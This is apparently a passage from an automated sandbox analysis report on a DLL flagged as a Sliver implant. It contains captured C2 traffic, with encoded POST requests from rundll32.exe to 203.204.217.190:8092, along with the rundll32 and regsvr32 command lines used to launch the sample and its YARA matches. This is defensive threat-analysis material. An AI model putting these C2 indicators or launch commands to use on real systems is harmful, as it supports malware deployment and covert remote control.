                                                                                                                                                                                                                    Data Ascii: PmwCGTUOsU_5Zt2Q9mOW7dt5bh+e1l-w2CjXzkZRIs6GwQO4z5BjkR-+pRovjQO0_Fa7ve00qC-8x46ujDoDrP6MqR4Jk4L+qCkSb4HSuC08wF6orQHtns4RvC_Sy3XJp5yhrQHFnDDRp8y2_5utkrnO-RH-oCnhipQLfd+J-Su7rsov-Py_qRyMsc_9ptBJjqu8u8LmxF0Rr44JoS6rv8RGkDBdiQch810MYclhLJZYR3HqBf7BdVcKXbJV8y5cP8o2wDBYlzLy-JnL7YvP7s984uT6lmUpEzhtouQA+mb6whCb3y4uxJILqiZI6vdEFcJr0ZBOMMGlq2FpRx-pYOntX8k-LHd51-G
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.071223021 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:22:36 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    18192.168.2.449766203.204.217.19080927624C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.073476076 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    19192.168.2.449768203.204.217.19080927624C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.105524063 CEST697OUTPOST /oauth/api/php/db/sign-up.html?_u=3355617q4&u=4866k2066 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 392
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 65 54 4b 66 61 61 61 61 61 61 61 63 5a 4e 61 68 61 41 74 59 50 6d 77 43 47 54 55 4f 73 55 5f 35 5a 74 32 51 39 6d 4f 57 37 64 74 35 62 68 2b 65 31 6c 2d 77 32 43 6a 58 7a 6b 5a 52 49 73 36 55 7a 46 66 52 73 5f 75 37 5f 38 42 6d 5f 63 35 36 6b 44 48 6a 70 51 36 68 77 53 42 2b 6a 35 30 74 6e 45 66 38 6a 64 44 51 76 64 4c 48 78 43 6a 37 6b 72 78 4e 77 35 6f 30 62 34 6b 74 76 63 36 5f 6f 65 75 75 79 73 6e 4a 77 72 31 4f 76 38 35 66 6b 39 4b 53 6b 72 4f 71 71 38 79 52 6f 71 6b 46 75 39 58 2b 73 34 6f 53 6e 5f 79 48 6c 32 35 39 76 72 72 68 69 70 51 4c 66 63 35 6f 72 50 6b 2d 71 52 36 6e 6a 32 6b 43 6f 5f 79 30 71 50 61 4e 6a 63 52 4c 6b 32 42 34 2d 44 36 46 6f 70 58 76 6a 64 52 36 6f 73 42 76 78 38 6b 69 71 64 5f 62 2d 38 57 68 5a 6e 62 35 78 46 51 57 52 64 51 53 30 69 5a 61 54 50 36 47 6f 5f 6d 58 62 39 6d 4d 52 2d 59 58 69 4f 6e 73 4a 4e 45 78 6a 73 6f 36 4d 71 63 4a 63 70 35 65 73 38 62 64 62 52 65 35 68 50 44 5a 52 37 5a 6b 73 39 37 50 6a 78 74 4d 2b 71 74 70 39 32 76 39 71 70 54 2b 4f 44 61 2d 5a 5a [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: eTKfaaaaaaacZNahaAtYPmwCGTUOsU_5Zt2Q9mOW7dt5bh+e1l-w2CjXzkZRIs6UzFfRs_u7_8Bm_c56kDHjpQ6hwSB+j50tnEf8jdDQvdLHxCj7krxNw5o0b4ktvc6_oeuuysnJwr1Ov85fk9KSkrOqq8yRoqkFu9X+s4oSn_yHl259vrrhipQLfc5orPk-qR6nj2kCo_y0qPaNjcRLk2B4-D6FopXvjdR6osBvx8kiqd_b-8WhZnb5xFQWRdQS0iZaTP6Go_mXb9mMR-YXiOnsJNExjso6MqcJcp5es8bdbRe5hPDZR7Zks97PjxtM+qtp92v9qpT+ODa-ZZYkLJZaYlInhXSM0dJQRWrDK+N3ItIUUopdJ0r0aa2ZZVFe98Whanaa
                                                                                                                                                                                                                    Sep 27, 2024 11:22:38.055094957 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:22:37 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    20192.168.2.449769203.204.217.19080927664C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.350692034 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    21192.168.2.449770203.204.217.19080927664C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.367018938 CEST692OUTPOST /db/namespaces/signin.html?rp=33556174&w=6871591h9 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 392
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 65 54 4b 66 61 61 61 61 61 61 61 63 5a 4e 61 68 61 41 74 59 50 6d 77 43 47 54 55 4f 73 55 5f 35 5a 74 32 51 39 6d 4f 57 37 64 74 35 62 68 2b 65 31 6c 2d 77 32 43 6a 58 7a 6b 5a 52 49 73 66 2b 2d 72 2d 4f 76 72 4c 75 6a 72 75 47 70 70 57 53 6b 73 35 6b 6e 72 44 34 5f 64 48 6f 6f 51 4c 44 77 64 4f 32 7a 35 30 74 79 38 4b 4e 75 72 4c 49 6f 38 72 37 6e 45 52 6f 62 45 6b 63 72 51 31 53 6c 64 75 4a 78 72 54 4a 73 73 42 30 78 73 42 42 75 5f 6f 49 2d 45 48 37 6e 44 79 66 79 51 52 62 78 34 6b 74 6c 5f 34 4e 79 38 44 50 76 51 36 6b 73 35 63 68 69 70 51 4c 66 35 5f 62 75 71 6b 2d 70 46 44 48 77 64 44 74 70 74 78 4f 78 39 4c 34 6f 34 2b 64 68 51 5f 46 6f 74 42 74 76 44 48 49 6e 72 6b 69 2d 45 42 76 6b 64 6f 36 6c 72 48 32 70 51 34 68 74 6f 59 33 47 71 4a 6c 43 66 78 34 75 56 2b 4a 75 4a 52 2d 35 49 51 4b 47 51 56 57 33 36 6e 6e 41 43 56 55 64 58 31 69 55 79 4c 7a 4d 44 4a 54 76 39 33 4e 53 44 54 4c 66 66 62 6a 69 6d 56 61 32 30 50 36 43 41 6d 75 58 63 39 41 55 54 4c 59 6a 38 73 55 66 44 63 52 51 4b 4c 58 69 51 [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: eTKfaaaaaaacZNahaAtYPmwCGTUOsU_5Zt2Q9mOW7dt5bh+e1l-w2CjXzkZRIsf+-r-OvrLujruGppWSks5knrD4_dHooQLDwdO2z50ty8KNurLIo8r7nERobEkcrQ1SlduJxrTJssB0xsBBu_oI-EH7nDyfyQRbx4ktl_4Ny8DPvQ6ks5chipQLf5_buqk-pFDHwdDtptxOx9L4o4+dhQ_FotBtvDHInrki-EBvkdo6lrH2pQ4htoY3GqJlCfx4uV+JuJR-5IQKGQVW36nnACVUdX1iUyLzMDJTv93NSDTLffbjimVa20P6CAmuXc9AUTLYj8sUfDcRQKLXiQsB8U527cAJyOdreycCQB6UPPr7IVtAVT5_9BG0aa2ZZ8Af0Kjhanaa
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.364435911 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:22:41 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    22192.168.2.449771203.204.217.19080927336C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.592505932 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    23192.168.2.449772203.204.217.19080927336C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.625525951 CEST681OUTPOST /database/namespaces/oauth2/oauth/database/rpc.html?bs=3q3556174&n=5l3348718 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 355
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 50 6d 77 43 47 54 55 4f 73 55 5f 35 5a 74 32 51 39 6d 4f 57 37 64 74 35 62 68 2b 65 31 6c 2d 77 32 43 6a 58 7a 6b 5a 52 49 73 36 66 79 5f 78 50 5f 74 34 38 78 53 6f 71 6e 51 4c 4b 6e 46 75 66 70 72 44 4e 6b 45 6b 5f 77 72 63 37 72 46 31 54 75 63 42 2d 5f 50 30 34 6f 45 6b 38 78 34 36 6e 78 32 35 6b 62 46 79 6b 5f 73 35 66 78 64 48 45 71 38 4c 64 73 74 34 4f 6a 51 48 44 6f 46 78 37 79 46 34 39 6b 64 35 72 6c 5f 6f 63 79 39 58 68 75 39 4b 38 5f 53 30 30 73 63 4f 35 5f 50 6e 68 69 70 51 4c 66 63 57 50 78 64 42 53 6b 73 44 62 6b 64 36 54 72 73 58 75 2d 50 72 51 2d 34 35 42 79 38 6f 42 76 52 79 6b 5f 45 5f 74 70 71 42 55 6e 74 44 35 2d 45 36 33 78 51 35 46 76 35 72 68 63 39 50 64 39 5f 6c 38 52 47 32 6c 49 55 43 69 42 73 39 4a 79 68 2d 6c 69 6f 72 51 68 4b 49 41 37 51 4f 56 73 4d 4a 49 44 68 4d 6a 59 50 5f 37 42 77 47 71 6a 66 48 75 35 6a 54 6f 43 38 4e 54 69 62 42 71 65 63 30 4a 4d 59 74 73 65 71 5f 49 31 70 33 57 45 4d 48 54 4f 51 77 55 72 65 69 4a 77 2d 4b 78 6f 66 45 36 53 74 32 57 59 2b 4d 7a 73 6f [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: PmwCGTUOsU_5Zt2Q9mOW7dt5bh+e1l-w2CjXzkZRIs6fy_xP_t48xSoqnQLKnFufprDNkEk_wrc7rF1TucB-_P04oEk8x46nx25kbFyk_s5fxdHEq8Ldst4OjQHDoFx7yF49kd5rl_ocy9Xhu9K8_S00scO5_PnhipQLfcWPxdBSksDbkd6TrsXu-PrQ-45By8oBvRyk_E_tpqBUntD5-E63xQ5Fv5rhc9Pd9_l8RG2lIUCiBs9Jyh-liorQhKIA7QOVsMJIDhMjYP_7BwGqjfHu5jToC8NTibBqec0JMYtseq_I1p3WEMHTOQwUreiJw-KxofE6St2WY+MzsoHNRKGCvPDKV2LE3Nj
                                                                                                                                                                                                                    Sep 27, 2024 11:22:43.579540014 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:22:43 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                    Start time:05:19:24
                                                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll"
                                                                                                                                                                                                                    Imagebase:0x8c0000
                                                                                                                                                                                                                    File size:126'464 bytes
                                                                                                                                                                                                                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000001.00000002.4218398121.000000000A114000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000001.00000002.4230715500.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                    Start time:05:19:24
                                                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                    Start time:05:19:24
                                                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1
                                                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                    Start time:05:19:24
                                                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:regsvr32.exe /i /s C:\Users\user\Desktop\5cPRapVOx6.dll
                                                                                                                                                                                                                    Imagebase:0xc90000
                                                                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                                                                    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000004.00000002.4218098729.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000004.00000003.3996852512.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000004.00000002.4229586587.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                    Start time:05:19:24
                                                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1
                                                                                                                                                                                                                    Imagebase:0xaa0000
                                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000005.00000002.4218005900.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000005.00000003.3835816223.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000005.00000002.4230484560.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                    Start time:05:19:24
                                                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllInstall
                                                                                                                                                                                                                    Imagebase:0xaa0000
                                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000006.00000002.4217009815.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000006.00000003.2589897810.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000006.00000002.4229493462.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                    Start time:05:19:27
                                                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllRegisterServer
                                                                                                                                                                                                                    Imagebase:0xaa0000
                                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000007.00000003.3672650809.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000007.00000002.4220285645.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000007.00000002.4229872481.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                    Start time:05:19:30
                                                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllUnregisterServer
                                                                                                                                                                                                                    Imagebase:0xaa0000
                                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000008.00000003.2663104353.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000008.00000002.4220443970.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000008.00000002.4231392141.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                    No disassembly